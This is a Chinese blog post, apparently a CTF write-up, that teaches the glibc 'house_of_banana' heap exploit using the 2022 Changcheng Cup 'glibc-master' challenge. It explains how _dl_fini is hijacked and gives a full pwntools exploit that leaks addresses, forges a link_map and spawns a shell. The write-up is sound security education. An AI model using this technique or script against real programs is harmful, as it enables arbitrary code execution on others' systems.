

<!DOCTYPE html>
<html lang="en" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>house_of_banana - ShouCheng</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="前言借2022长城杯的一道题学习house_of_ba...">
  <meta name="author" content="ShouCheng">
  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1445822_r673sha78lq.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: '[object Object]'
      },
      donate: {
        enable: false,
        alipay: '',
        wechat: ''
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: true
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '总之岁月漫长，然而值得等待！',
          typing: true,
          api: 'https://v2.jinrishici.com/one.json',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: true,
        type: 'url',
        image: '',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: true,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: true,
        path: '/search.xml'
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="ShouCheng" type="application/atom+xml">
</head>

<body class="lock-screen">
  <div class="loading"></div>
  
    


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconhome j-navbar-back-home"></i>
      
      
        <i class="iconfont iconqrcode j-navbar-qrcode"></i>
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
      
        <i class="iconfont iconsearch j-navbar-search"></i>
      
    </div>
    <div class="center">house_of_banana</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
      <div id="qrcode-navbar"></div>
    
  </nav>

  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/galleries/ " class="underline "> 摄影</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="/images/theme/post-image.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">house_of_banana</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>August 25, 2022</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>6641</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>借2022长城杯的一道题学习house_of_banana</p>
<h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><p>详细原理可以直接查看放在学习链接里的文章，我也是通过这篇文章学习的，内容就不搬过来了。</p>
<p>house_of_banana 攻击的是 _rtld_global 的 link_map 链表，通过正常 main 函数返回或者调用 exit 退出，触发函数调用链：<code>exit()-&gt;_dl_fini-&gt;(fini_t)array[i]</code></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">void</span><br>_dl_fini (<span class="hljs-keyword">void</span>)<br>&#123;<br>...<br>   <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">link_map</span> *<span class="hljs-title">maps</span>[<span class="hljs-title">nloaded</span>];</span>    <br><br>   <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> i;<br>   <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">link_map</span> *<span class="hljs-title">l</span>;</span><br>   assert (nloaded != <span class="hljs-number">0</span> || GL(dl_ns)[ns]._ns_loaded == <span class="hljs-literal">NULL</span>);<br>   <span class="hljs-keyword">for</span> (l = GL(dl_ns)[ns]._ns_loaded, i = <span class="hljs-number">0</span>; l != <span class="hljs-literal">NULL</span>; l = l-&gt;l_next)<br>     <span class="hljs-comment">/* Do not handle ld.so in secondary namespaces.  */</span><br>     <span class="hljs-keyword">if</span> (l == l-&gt;l_real)      <span class="hljs-comment">//检查节点的地址是否跟自己结构体保存的一致</span><br>       &#123;<br>  assert (i &lt; nloaded);<br><br>  maps[i] = l;<br>  l-&gt;l_idx = i;<br>  ++i;<br><br>  <span class="hljs-comment">/* Bump l_direct_opencount of all objects so that they</span><br><span class="hljs-comment">     are not dlclose()ed from underneath us.  */</span><br>  ++l-&gt;l_direct_opencount;<br>       &#125;<br>   assert (ns != LM_ID_BASE || i == nloaded);<br>   assert (ns == LM_ID_BASE || i == nloaded || i == nloaded - <span class="hljs-number">1</span>);<br>   <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> nmaps = i;<br><br>   _dl_sort_maps (maps + (ns == LM_ID_BASE), nmaps - (ns == LM_ID_BASE),<br>    <span class="hljs-literal">NULL</span>, <span class="hljs-literal">true</span>);<br><br>   __rtld_lock_unlock_recursive (GL(dl_load_lock));<br><br>   <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i &lt; nmaps; ++i)<br>     &#123;<br>       <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">link_map</span> *<span class="hljs-title">l</span> =</span> maps[i];   <span class="hljs-comment">//l遍历link_map的链表</span><br><br>       <span class="hljs-keyword">if</span> (l-&gt;l_init_called)     <span class="hljs-comment">//重要的检查点</span><br>  &#123;<br>    l-&gt;l_init_called = <span class="hljs-number">0</span>;      <br><br>    <span class="hljs-comment">/* Is there a destructor function?  */</span><br>    <span class="hljs-keyword">if</span> (l-&gt;l_info[DT_FINI_ARRAY] != <span class="hljs-literal">NULL</span><br>        || (ELF_INITFINI &amp;&amp; l-&gt;l_info[DT_FINI] != <span class="hljs-literal">NULL</span>))<br>      &#123;<br>        <span class="hljs-comment">/* When debugging print a message first.  */</span><br>        <span class="hljs-keyword">if</span> (__builtin_expect (GLRO(dl_debug_mask)<br>         &amp; DL_DEBUG_IMPCALLS, <span class="hljs-number">0</span>))<br>   _dl_debug_printf (<span class="hljs-string">&quot;\ncalling fini: %s [%lu]\n\n&quot;</span>,<br>       DSO_FILENAME (l-&gt;l_name),<br>       ns);<br><br>        <span class="hljs-comment">/* First see whether an array is given.  */</span><br>        <span class="hljs-keyword">if</span> (l-&gt;l_info[DT_FINI_ARRAY] != <span class="hljs-literal">NULL</span>)<br>   &#123;<br>     ElfW(Addr) *<span class="hljs-built_in">array</span> =<br>       (ElfW(Addr) *) (l-&gt;l_addr<br>         + l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr);<br>     <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> i = (l-&gt;l_info[DT_FINI_ARRAYSZ]-&gt;d_un.d_val<br>         / <span class="hljs-keyword">sizeof</span> (ElfW(Addr)));<br>     <span class="hljs-keyword">while</span> (i-- &gt; <span class="hljs-number">0</span>)<br>       ((<span class="hljs-keyword">fini_t</span>) <span class="hljs-built_in">array</span>[i]) ();     <span class="hljs-comment">//目标位置</span><br>   &#125;<br><br>....<br>&#125;<br></code></pre></td></tr></table></figure>

<p>重点关注</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs c">ElfW(Addr) *<span class="hljs-built_in">array</span> =<br>  (ElfW(Addr) *) (l-&gt;l_addr<br>    + l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr);<br><span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span> i = (l-&gt;l_info[DT_FINI_ARRAYSZ]-&gt;d_un.d_val<br>    / <span class="hljs-keyword">sizeof</span> (ElfW(Addr)));<br><span class="hljs-keyword">while</span> (i-- &gt; <span class="hljs-number">0</span>)<br>  ((<span class="hljs-keyword">fini_t</span>) <span class="hljs-built_in">array</span>[i]) ();<br></code></pre></td></tr></table></figure>

<p>DT_FINI_ARRAY宏定义为26，DT_FINI_ARRAYSZ宏定义为28。d_un.d_ptr 则是取 +8 处的指针，d_un.d_val 则是取 +8 处的值。</p>
<p>在有些情况下，rtld_global_ptr与libc_base的偏移在本地与远程并不是固定的，远程的 ld.so 以及 TLS 等结构的地址与libc地址之间的偏移与本地的会不一样，但是大致处于一个范围内，并且，在同一个系统里，这个差值是固定的，其差值的变化往往在偏移的第1.5BYTE~2.5BYTE的位置，即地址十六进制的第4、5个数，因此我们只需爆破两个十六进制数即可。</p>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>通过 large bin attack 替换 link_map 链表第三节点的 l_next。</p>
<p>可以利用下面的命令查看需要修改的地址。</p>
<p><code>distance &amp;_rtld_global &amp;(_rtld_global._dl_ns._ns_loaded-&gt;l_next-&gt;l_next-&gt;l_next)</code></p>
<p><img   class="lazyload" data-original="/2022/08/25/2022-08-25-house-of-banana/image-20220825143354716.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220825143354716</span></p>
<p>link_map 布局：</p>
<ul>
<li>*(fake+0x28) = fake</li>
<li>*(fake+0x48) = fake + 0x58, </li>
<li>*(fake+0x50) = 0x8</li>
<li>*(fake+0x58) = shell</li>
<li>*(fake+0x110) = fake + 0x40</li>
<li>*(fake+0x120) = fake + 0x48</li>
<li>(int)*(fake+0x31c) = 0x9</li>
<li>fake 是写入到 link_map 链表第四节点的堆块地址</li>
</ul>
<h2 id="题目-glibc-master"><a href="#题目-glibc-master" class="headerlink" title="题目 glibc-master"></a>题目 glibc-master</h2><p><img   class="lazyload" data-original="/2022/08/25/2022-08-25-house-of-banana/image-20220825143519008.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220825143519008</span></p>
<p>申请函数，只允许申请到0x40f~0x60f的堆块。</p>
<p><img   class="lazyload" data-original="/2022/08/25/2022-08-25-house-of-banana/image-20220825143505081.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220825143505081</span></p>
<p>释放时存在UAF。</p>
<p><img   class="lazyload" data-original="/2022/08/25/2022-08-25-house-of-banana/image-20220825143604709.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220825143604709</span></p>
<p>打印函数只允许打印两次，但是能直接打印地址。</p>
<p><img   class="lazyload" data-original="/2022/08/25/2022-08-25-house-of-banana/image-20220825143628967.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220825143628967</span></p>
<p><img   class="lazyload" data-original="/2022/08/25/2022-08-25-house-of-banana/image-20220825143758891.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220825143758891</span></p>
<p>编辑函数把真正操作堆块内容的部分都隐藏了，无法反汇编，只能查看汇编语言进行分析。嫌麻烦，没去分析，选择直接去调试，发现只要写入的数据长度小于申请的size就是正常的写入，如果等于，输入的内容就会被更改成垃圾数据。</p>
<p>所以这题不难，利用好 largebin attack 即可。</p>
<p>要使用 house of banana，是需要有 libc 和 堆地址的，libc比较容易，申请释放一个堆块即可。</p>
<p><img   class="lazyload" data-original="/2022/08/25/2022-08-25-house-of-banana/image-20220825144305886.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220825144305886</span></p>
<p>因为打印函数是 puts，存在 ‘\x00’阻断，所以堆地址需要在 fd 上才能被打印出来。大堆块自然能够想到都是 large bin 时，fd是会指向堆块的，也就可以泄露出堆地址。</p>
<p><img   class="lazyload" data-original="/2022/08/25/2022-08-25-house-of-banana/image-20220825144537239.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220825144537239</span></p>
<p>接着就是利用 largebin attack 写入堆地址，再将堆块伪造成 link_map 的节点。</p>
<p><img   class="lazyload" data-original="/2022/08/25/2022-08-25-house-of-banana/image-20220825144842830.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220825144842830</span></p>
<p>然后成功getshell。</p>
<p><img   class="lazyload" data-original="/2022/08/25/2022-08-25-house-of-banana/image-20220825144055306.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220825144055306</span></p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!usr/bin/env python </span><br><span class="hljs-comment">#coding=utf-8</span><br><span class="hljs-keyword">from</span> errno <span class="hljs-keyword">import</span> EDEADLK<br><span class="hljs-keyword">from</span> re <span class="hljs-keyword">import</span> S<br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch = <span class="hljs-string">&#x27;amd64&#x27;</span>,os = <span class="hljs-string">&#x27;linux&#x27;</span>,log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br>elf = ELF(<span class="hljs-string">&#x27;./glibc_master&#x27;</span>)<br>DEBUG = <span class="hljs-number">1</span><br><span class="hljs-keyword">if</span> DEBUG:<br>    libc = ELF(<span class="hljs-string">&quot;/home/shoucheng/tools/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/libc-2.31.so&quot;</span>)<br>    ld = ELF(<span class="hljs-string">&quot;/home/shoucheng/tools/glibc-all-in-one/libs/2.31-0ubuntu9.2_amd64/ld-2.31.so&quot;</span>)<br>    p = process(argv=[ld.path,elf.path], env=&#123;<span class="hljs-string">&quot;LD_PRELOAD&quot;</span> : libc.path&#125;)<br><span class="hljs-keyword">else</span>:<br>    ip = <span class="hljs-string">&#x27;123.56.77.227&#x27;</span><br>    port = <span class="hljs-number">42231</span><br>    <span class="hljs-comment">#libc = ELF(&quot;./libc.so.6&quot;)</span><br>    p = remote(ip, port)<br>    <br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">debug</span>(<span class="hljs-params">info=<span class="hljs-string">&quot;b main&quot;</span></span>):</span><br>	gdb.attach(p, info)<br>	<span class="hljs-comment">#gdb.attach(p, &quot;b *$rebase(0x)&quot;)</span><br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add</span>(<span class="hljs-params">idx, size</span>):</span><br>    p.sendlineafter(<span class="hljs-string">b&quot;&gt;&gt;&quot;</span>, <span class="hljs-string">b&#x27;1&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">b&quot;input index:\n&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(idx).encode(<span class="hljs-string">&#x27;ascii&#x27;</span>))<br>    p.recvuntil(<span class="hljs-string">b&quot;input size:\n&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(size).encode(<span class="hljs-string">&#x27;ascii&#x27;</span>))<br>	<br>	<br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">edit</span>(<span class="hljs-params">idx, content</span>):</span><br>    p.sendlineafter(<span class="hljs-string">b&quot;&gt;&gt;&quot;</span>, <span class="hljs-string">b&#x27;2&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">b&quot;input index:\n&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(idx).encode(<span class="hljs-string">&#x27;ascii&#x27;</span>))<br>    p.recvuntil(<span class="hljs-string">b&quot;input context:\n&quot;</span>)<br>    p.sendline(content)<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">show</span>(<span class="hljs-params">idx</span>):</span><br>    p.sendlineafter(<span class="hljs-string">b&quot;&gt;&gt;&quot;</span>, <span class="hljs-string">b&#x27;3&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">b&quot;input index:\n&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(idx).encode(<span class="hljs-string">&#x27;ascii&#x27;</span>))<br><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">free</span>(<span class="hljs-params">idx</span>):</span><br>    p.sendlineafter(<span class="hljs-string">b&quot;&gt;&gt;&quot;</span>, <span class="hljs-string">b&#x27;4&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">b&quot;input index:\n&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(idx).encode(<span class="hljs-string">&#x27;ascii&#x27;</span>))<br><br>add(<span class="hljs-number">0</span>, <span class="hljs-number">0x428</span>)<br>add(<span class="hljs-number">1</span>, <span class="hljs-number">0x410</span>)<br>add(<span class="hljs-number">2</span>, <span class="hljs-number">0x418</span>)<br>add(<span class="hljs-number">3</span>, <span class="hljs-number">0x410</span>)<br>free(<span class="hljs-number">0</span>)<br>show(<span class="hljs-number">0</span>)<br>leak = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)) - <span class="hljs-number">0x1ebbe0</span><br>log.info(<span class="hljs-string">&quot;libc_base==&gt;0x%x&quot;</span> %leak)<br>add(<span class="hljs-number">4</span>, <span class="hljs-number">0x500</span>)<br>free(<span class="hljs-number">2</span>)<br>add(<span class="hljs-number">5</span>, <span class="hljs-number">0x500</span>)<br>show(<span class="hljs-number">0</span>)<br>heap = u64(p.recv(<span class="hljs-number">6</span>).ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>)) - <span class="hljs-number">0xae0</span><br>log.info(<span class="hljs-string">&quot;heap_base==&gt;0x%x&quot;</span> %heap)<br>add(<span class="hljs-number">6</span>, <span class="hljs-number">0x418</span>)<br>free(<span class="hljs-number">6</span>)<br>fd = leak + <span class="hljs-number">0x1ebfd0</span><br>target = <span class="hljs-number">0x1f2018</span> + leak<br>edit(<span class="hljs-number">0</span>, p64(fd)*<span class="hljs-number">2</span> + p64(heap+<span class="hljs-number">0x290</span>) + p64(target-<span class="hljs-number">0x20</span>))<br>add(<span class="hljs-number">7</span>, <span class="hljs-number">0x500</span>)<br>ogg = leak + <span class="hljs-number">0xe6c7e</span><br>fake = heap + <span class="hljs-number">0xae0</span><br>fake_link_map = <span class="hljs-string">b&#x27;&#x27;</span><br>fake_link_map = fake_link_map.ljust(<span class="hljs-number">0x18</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>) + p64(fake)<br>fake_link_map = fake_link_map.ljust(<span class="hljs-number">0x38</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>) + p64(fake+<span class="hljs-number">0x58</span>) + p64(<span class="hljs-number">8</span>) + p64(ogg)<br>fake_link_map = fake_link_map.ljust(<span class="hljs-number">0x100</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>) + p64(fake+<span class="hljs-number">0x40</span>)<br>fake_link_map += p64(<span class="hljs-number">0</span>) + p64(fake+<span class="hljs-number">0x48</span>)<br>fake_link_map = fake_link_map.ljust(<span class="hljs-number">0x30C</span>, <span class="hljs-string">b&#x27;\x00&#x27;</span>) + p32(<span class="hljs-number">9</span>)<br>edit(<span class="hljs-number">2</span>, fake_link_map)<br>p.sendlineafter(<span class="hljs-string">b&quot;&gt;&gt;&quot;</span>, <span class="hljs-string">b&#x27;1&#x27;</span>)<br>p.recvuntil(<span class="hljs-string">b&quot;input index:\n&quot;</span>)<br><br><span class="hljs-comment">#debug()</span><br>p.sendline(<span class="hljs-string">b&#x27;30&#x27;</span>)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<h2 id="学习链接"><a href="#学习链接" class="headerlink" title="学习链接"></a>学习链接</h2><p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/222948#h2-9">https://www.anquanke.com/post/id/222948#h2-9</a></p>
<p><a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/535469996">https://zhuanlan.zhihu.com/p/535469996</a></p>

      </section>
      <section class="extra">
        
          <ul class="copyright">
  
    <li><strong>本文作者：</strong>ShouCheng</li>
    <li><strong>本文链接：</strong><a href="http://shoucheng3.github.io/2022/08/25/2022-08-25-house-of-banana/index.html" title="http:&#x2F;&#x2F;shoucheng3.github.io&#x2F;2022&#x2F;08&#x2F;25&#x2F;2022-08-25-house-of-banana&#x2F;index.html">http:&#x2F;&#x2F;shoucheng3.github.io&#x2F;2022&#x2F;08&#x2F;25&#x2F;2022-08-25-house-of-banana&#x2F;index.html</a></li>
    <li><strong>版权声明：</strong>本博客所有文章均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" title="BY-NC-SA" target="_blank" rel="noopener">BY-NC-SA</a> 许可协议，转载请注明出处！</li>
  
</ul>
        
        
        
        
  <nav class="nav">
    <a href="/2022/09/08/2022-09-08-angr%E4%BD%BF%E7%94%A8/"><i class="iconfont iconleft"></i>angr使用</a>
    <a href="/2022/08/25/2022-08-25-2022%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A2/">2022巅峰极客<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
        <section class="comments">
  
    <div class="btn" id="comments-btn">查看评论</div>
  
  
</section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-text">原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8"><span class="toc-text">利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE-glibc-master"><span class="toc-text">题目 glibc-master</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AD%A6%E4%B9%A0%E9%93%BE%E6%8E%A5"><span class="toc-text">学习链接</span></a></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="tencent://message/?Menu=yes&uin=1145020611 "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#12B7F5'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconQQ "></i>
      </a><a 
        href="javascript:; "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#09BB07'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconwechat-fill "></i>
      </a><a 
        href="https://www.instagram.com/izhaoo/ "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#DA2E76'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconinstagram "></i>
      </a><a 
        href="https://shoucheng3.github.io "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
